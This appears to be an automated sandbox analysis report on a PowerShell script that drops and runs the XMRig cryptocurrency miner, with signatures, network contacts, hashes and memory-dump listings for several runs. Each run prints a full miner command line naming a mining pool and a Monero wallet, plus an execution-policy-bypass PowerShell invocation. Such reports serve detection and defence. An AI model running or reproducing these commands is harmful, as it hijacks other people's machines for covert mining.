memory/1592-77-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-78-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-79-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-80-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-81-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-82-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-83-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-84-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-85-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-86-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-87-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-88-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-89-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-90-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-91-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-92-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-93-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-94-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-95-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-96-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-97-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-98-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-99-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-100-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-101-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-102-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-103-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-104-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-105-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-106-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-107-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-108-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-109-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-110-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-111-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-112-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-113-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-114-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-115-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-116-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-117-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-118-0x00007FF663920000-0x00007FF664553000-memory.dmp

memory/1592-119-0x00007FF663920000-0x00007FF664553000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:20

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1756s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4944-0-0x00007FFB21403000-0x00007FFB21405000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wx54ioyj.mzk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4944-9-0x000002A226D20000-0x000002A226D42000-memory.dmp

memory/4944-10-0x00007FFB21400000-0x00007FFB21EC2000-memory.dmp

memory/4944-11-0x00007FFB21400000-0x00007FFB21EC2000-memory.dmp

memory/4944-12-0x00007FFB21400000-0x00007FFB21EC2000-memory.dmp

memory/4944-14-0x000002A226FC0000-0x000002A226FD2000-memory.dmp

memory/4944-15-0x000002A226FB0000-0x000002A226FBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1632-46-0x000001ABCE650000-0x000001ABCE670000-memory.dmp

memory/1632-47-0x000001ABCFF50000-0x000001ABCFF70000-memory.dmp

memory/1632-48-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/4944-49-0x00007FFB21403000-0x00007FFB21405000-memory.dmp

memory/4944-50-0x00007FFB21400000-0x00007FFB21EC2000-memory.dmp

memory/1632-51-0x000001ABCFF70000-0x000001ABCFF90000-memory.dmp

memory/1632-52-0x000001ABCFF90000-0x000001ABCFFB0000-memory.dmp

memory/1632-53-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-54-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-57-0x000001ABCFF90000-0x000001ABCFFB0000-memory.dmp

memory/1632-56-0x000001ABCFF70000-0x000001ABCFF90000-memory.dmp

memory/1632-55-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-58-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-59-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-60-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-61-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-62-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-63-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-64-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-65-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-66-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-67-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-68-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-69-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-70-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-71-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-72-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-73-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-74-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-75-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-76-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-77-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-78-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-79-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-80-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-81-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-82-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-83-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-84-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-85-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-86-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-87-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-88-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-89-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-90-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-91-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-92-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-93-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-94-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-95-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-96-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-97-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-98-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-99-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-100-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-101-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-102-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-103-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-104-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-105-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-106-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-107-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-108-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-109-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-110-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-111-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-112-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-113-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-114-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-115-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

memory/1632-116-0x00007FF6D4B90000-0x00007FF6D57C3000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:23

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 104.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

memory/1640-3-0x00007FFDDF723000-0x00007FFDDF724000-memory.dmp

memory/1640-5-0x0000026AC1EE0000-0x0000026AC1F02000-memory.dmp

memory/1640-6-0x00007FFDDF720000-0x00007FFDE010C000-memory.dmp

memory/1640-9-0x00007FFDDF720000-0x00007FFDE010C000-memory.dmp

memory/1640-10-0x0000026ADA5D0000-0x0000026ADA646000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45skuy1a.drk.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1640-25-0x00007FFDDF720000-0x00007FFDE010C000-memory.dmp

memory/1640-48-0x0000026ADA3F0000-0x0000026ADA402000-memory.dmp

memory/1640-61-0x0000026ADA3E0000-0x0000026ADA3EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/912-90-0x00000273B98D0000-0x00000273B98F0000-memory.dmp

memory/912-91-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/1640-92-0x00007FFDDF720000-0x00007FFDE010C000-memory.dmp

memory/1640-94-0x00007FFDDF723000-0x00007FFDDF724000-memory.dmp

memory/912-93-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/1640-95-0x00007FFDDF720000-0x00007FFDE010C000-memory.dmp

memory/912-96-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-97-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-98-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-99-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-100-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-101-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-102-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-103-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-104-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-105-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-106-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-107-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-108-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-109-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-110-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-111-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-112-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-113-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-114-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-115-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-116-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-117-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-118-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-119-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-120-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-121-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-122-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-123-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-124-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-125-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-126-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-127-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-128-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-129-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-130-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-131-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-132-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-133-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-134-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-135-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-136-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-137-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-138-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-139-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-140-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-141-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-142-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-143-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-144-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-145-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-146-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-147-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-148-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-149-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-150-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-151-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-152-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-153-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-154-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-155-0x00007FF603520000-0x00007FF604153000-memory.dmp

memory/912-156-0x00007FF603520000-0x00007FF604153000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:32

Platform

win10v2004-20240426-en

Max time kernel

1791s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
